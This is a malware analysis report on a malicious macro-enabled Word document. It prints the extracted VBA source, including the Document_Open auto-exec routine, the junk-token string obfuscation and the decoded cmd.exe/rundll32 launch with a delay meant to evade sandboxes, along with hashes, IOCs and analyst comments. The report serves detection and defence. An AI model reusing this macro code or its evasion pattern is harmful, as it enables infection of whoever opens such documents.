Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 405b918189ab1ba4…

MALICIOUS

Office (OOXML)

110.0 KB Created: 2021-10-05 11:31:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2021-10-12
MD5: 36b9bc3266dda132c7524edcdf8aac9e SHA-1: d31c3435a72ae5377ff1d3d97a903be6638791dd SHA-256: 405b918189ab1ba4f756be1e698a7375e2add4ba04c8edc75a83bc58ff526eab
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment — additionally, from the command line decoded out of the extracted macro (see holehfls below): T1059.003 Windows Command Shell (cmd.exe /c …), T1218.011 Rundll32 (rundll32.exe …\cnkljb.dll,Kali) and, likely, T1497.003 Time Based Evasion (the `choice … /T 30` 30-second delay before launch).

The file is an OOXML Word document whose word/vbaProject.bin holds a VBA project with a Document_Open macro, so the code runs as soon as the document is opened with macros enabled. The macro strings are obfuscated by splicing a junk token ("ekw", then "bDr") into every character run and stripping it again at runtime with a helper (lsjalkjd.nlqkflsk); removing the tokens by hand recovers the launch command `C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 30 & start C:\Windows\System32\rundll32.exe C:\ProgramData\cnkljb.dll,Kali` — a ~30-second `choice` delay (a cheap sandbox/analysis evasion) followed by rundll32 invoking export `Kali` of a DLL in C:\ProgramData. The ClamAV name calls it a downloader, but the visible source contains no download code: it executes a DLL that is expected to already be on disk, and the part of the project that places cnkljb.dll there (if any) lies beyond the truncated excerpt. Verdict stands as MALICIOUS on the auto-exec → cmd.exe → rundll32 chain alone; treat C:\ProgramData\cnkljb.dll and the `choice /C Y /N /D Y /T 30` command line as host IOCs.

Heuristics 5

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    All six are standard OOXML/Office XML namespace URIs present in every Word document; they are not contacted at runtime and are not indicators. No URL was reached through the macro channel, consistent with the macro launching a local DLL rather than downloading one.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 43482 bytes
SHA-256: 1dae0e1b725164b218ce9890af6d8afaa4ed7f44d2ab9223e33b9b18c78c81d0
Preview script
First 1,000 lines of the extracted script (the excerpt shown here is cut off at "... (truncated)" inside lsjalkjd.jgoleirh; the full 43,482-byte source, including the helpers falkhqlsih and nlqkflsk referenced below, is in macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header (olevba export) for the document's ThisDocument class module —
' the module Word runs Document_Open from. Everything below, up to the next
' "Attribute VB_Name" line, belongs to this module.
' Decoy routine: locates strFind inside a cell's text and colours/bolds the
' match. It uses Excel-style Range calls (.value, .Characters(Start:=, Length:=),
' .Font.ColorIndex) although the host is a Word document, and nothing in the
' visible source calls it — it reads as padding copied in so the project looks
' like ordinary spreadsheet code. Not part of the execution chain.
Function sertsd(ByVal rCell As Range, _
                        ByVal strFind As String)
    j = InStr(1, rCell.value, strFind, vbTextCompare)
    With rCell
        .Characters(Start:=j, Length:=Len(strFind)).Font.ColorIndex = 3
        .Characters(Start:=j, Length:=Len(strFind)).Font.Bold = True
    End With
End Function

' Decoy routine: never called from the visible source, and it could not run to
' completion anyway — oWbMain is declared but never Set, so oWbMain.FullName
' would raise run-time error 91 on first use, and ActiveWorkbook is an Excel
' name, not a Word one (with no Option Explicit it compiles as an empty Variant).
' Junk code that pads the project; ignore for the execution chain.
Sub sgaswreta()
Dim i As Long, m
Dim iNbRow As Long, iRowStart As Long: iRowStart = 1
Dim iNbCol As Long, iClnStart As Long: iClnStart = 1
Dim oSh As Object
Dim oWb As Object '
Dim oWbMain As Object
Dim strWbMainFullName As String: strWbMainFullName = oWbMain.FullName

Dim strWbMainName As String
m = Split(strWbMainFullName, ".", -1, vbTextCompare)
strWbMainName = m(LBound(m))
strWbMainName = Trim(oSh.Cells(iRowStart, 1).value)
EventsChange False
Set oWb = ActiveWorkbook
EventsChange True
End Sub

' Core launcher, called from Document_Open.
'   1. lsjalkjd.falkhqlsih(0, "sdfgw4", "893792", 0, 0) is a gate whose body is
'      not in this excerpt; the launch happens only when it returns 0. The Else
'      branch is dead filler (df/d are computed and discarded), as is sdf = Sin(3).
'   2. The command and its arguments are string literals with a junk token
'      ("ekw", then "bDr") spliced into them, passed through
'      lsjalkjd.nlqkflsk(text, token). Stripping the token by hand yields valid
'      Windows paths, so nlqkflsk is almost certainly a Replace-style helper
'      (its body is not visible here). Decoded values:
'        Caption -> C:\Windows\System32\cmd.exe
'        Tag     -> /c choice /C Y /N /D Y /T 30 & start
'                   C:\Windows\System32\rundll32.exe C:\ProgramData\cnkljb.dll,Kali
'      i.e. cmd.exe waits ~30 s (`choice` with a default answer and a timeout —
'      a cheap sandbox/analysis delay), then runs rundll32 on the DLL at
'      C:\ProgramData\cnkljb.dll, calling its export "Kali".
'      The decoded strings are parked in a UserForm control's Caption/Tag
'      (vbnkljb34.OptionButton3) rather than in locals, so a plain string dump
'      of this module never shows the assembled command line.
'   3. lsjalkjd.jgoleirh 3, <cmd.exe>, <arguments> hands them to the launcher
'      (see jgoleirh below, which forwards them to weuorihod.jflwk).
' Nothing visible here downloads cnkljb.dll; how it reaches ProgramData is not
' shown in this excerpt.
' IOCs: C:\ProgramData\cnkljb.dll, rundll32 export "Kali",
'       the literal "choice /C Y /N /D Y /T 30" command line.
Public Sub holehfls()
    Dim sdf As Double
    Dim fojn As Long
    
    sdf = Sin(3)
    
    fojn = lsjalkjd.falkhqlsih(0, "sdfgw4", "893792", 0, 0)
    If fojn = 0 Then
    
        ' "ekw" removed -> C:\Windows\System32\cmd.exe
        vbnkljb34.OptionButton3.Caption = "Cekw:ekw\ekwWekwinekwdoekwwekws\ekwSekwyekwstekwemekw3ekw2\cekwmdekw.eekwxekwe"
        vbnkljb34.OptionButton3.Caption = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Caption, "ekw")
        
        ' "bDr" removed -> /c choice /C Y /N /D Y /T 30 & start C:\Windows\System32\rundll32.exe C:\ProgramData\cnkljb.dll,Kali
        vbnkljb34.OptionButton3.Tag = "bDr/bDrc cbDrhobDricbDre /CbDr bDrY bDr/bDrN bDr/DbDr YbDr /TbDr 3bDr0 bDr& sbDrtabDrrt bDrCbDr:bDr\bDrWibDrndbDrowbDrs\SbDrysbDrtebDrm3bDr2\rbDrunbDrdlbDrl3bDr2.bDrexbDre CbDr:bDr\bDrPrbDrogbDrrabDrmDbDratbDra\cnkbDrljb.dbDrlbDrl,KbDralbDri"
        vbnkljb34.OptionButton3.Tag = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Tag, "bDr")
        
        ' Launch: (3, "C:\Windows\System32\cmd.exe", "<arguments above>")
        lsjalkjd.jgoleirh 3, vbnkljb34.OptionButton3.Caption, vbnkljb34.OptionButton3.Tag
    Else
        Dim df As Integer
        Dim d As String
        df = 4
        d = CStr(df)
    End If
End Sub


' Decoy helper: only sgaswreta calls it, and sgaswreta is itself never called.
' Toggles Application.ScreenUpdating / .ShowWindowsInTaskbar / .DisplayAlerts /
' .EnableEvents to `value` and sets the calculation mode; .Calculation,
' .EnableEvents and the xlCalculation* constants are Excel object-model names
' that do not exist in Word. Padding, not part of the execution chain.
Sub EventsChange(value As Boolean)
    With Application
        .Calculation = xlCalculationAutomatic
        .ScreenUpdating = value
        .ShowWindowsInTaskbar = value
        .DisplayAlerts = value
        .EnableEvents = value
        If value Then
            .Calculation = xlCalculationAutomatic
            Else: .Calculation = xlCalculationManual
        End If
    End With
End Sub


' Auto-execution entry point: Word runs this when the document is opened with
' macros enabled (OLE_VBA_DOCOPEN / T1059.005). The only meaningful work is the
' call to holehfls; the locals and the final read of the Caption into an unused
' variable are filler. Note "Dim x, y, z As Double" types only z — x and y are
' Variants (standard VBA declaration rule), another sign of pasted junk.
Private Sub Document_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    holehfls
    hnfkj = vbnkljb34.OptionButton3.Caption
End Sub

Attribute VB_Name = "vbnkljb34"
Attribute VB_Base = "0{9FCECD69-FED3-4FCB-B404-E00301D1960E}{3372E92E-832F-4C27-9377-45E68FD738B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module header for "vbnkljb34": the two-GUID VB_Base value is how an exported
' MSForms UserForm is marked, and holehfls / jgoleirh address its OptionButton3
' and ListBox1 controls. The form carries no code of its own here; it serves as
' a hiding place for the decoded command strings (OptionButton3.Caption / .Tag).

Attribute VB_Name = "lsjalkjd"
' Module header for "lsjalkjd": the module holehfls resolves its helpers from —
' falkhqlsih (gate), nlqkflsk (token-stripping string decoder) and jgoleirh
' (launcher). Only FnDelDub and the start of jgoleirh are visible below;
' falkhqlsih and nlqkflsk lie beyond the truncation point.

' Decoy routine, never called from the visible source: removes duplicate rows
' from column 1 of an Excel worksheet via Range.RemoveDuplicates, returning
' False from the On Error handler if anything fails. Uses Excel-only names
' (Rows.Count, xlUp, xlYes). Same padding pattern as sertsd / sgaswreta.
Function FnDelDub(ByVal oSh As Object, _
                    Optional ByVal iRowStart As Long = 1, _
                    Optional ByVal iClnStart As Long = 1) As Boolean
    Dim aColsArr(), i&
    Dim iNbRow As Long, iNbCln As Long
    Dim strCellSelect
On Error GoTo FnDelDub_Err
    With oSh
        iNbCln = 1 '.Cells(1, 256).End(xlToLeft).Column
        iNbRow = .Cells(Rows.Count, 1).End(xlUp).Row
        strCellSelect = Range(.Cells(iRowStart, iClnStart), .Cells(iNbRow, iNbCln)).Address
        ReDim aColsArr(iNbCln - 1)
        For i = 1 To iNbCln
            aColsArr(i - 1) = i
        Next
        .Range(strCellSelect).RemoveDuplicates (aColsArr), xlYes
    End With
    Erase aColsArr
    FnDelDub = True: Exit Function
FnDelDub_Err:
FnDelDub = False
End Function


Sub jgoleirh(flkas As Long, fewo4ih As String, jgdlfk As String)
    vbnkljb34.ListBox1.AddItem
    vbnkljb34.ListBox1.AddItem
    weuorihod.jflwk 0, vbNullString, fewo4ih, jgdlfk, vbNu
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 95744 bytes
SHA-256: a02a402c85c1049466a34a10c6d54682db6a3026a5a1234ac36379ff281b58ad
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely (automated label on the raw vbaProject.bin; contradicted by the decoded source above, whose command strings are obfuscated by junk-token insertion — treat this label as a false negative)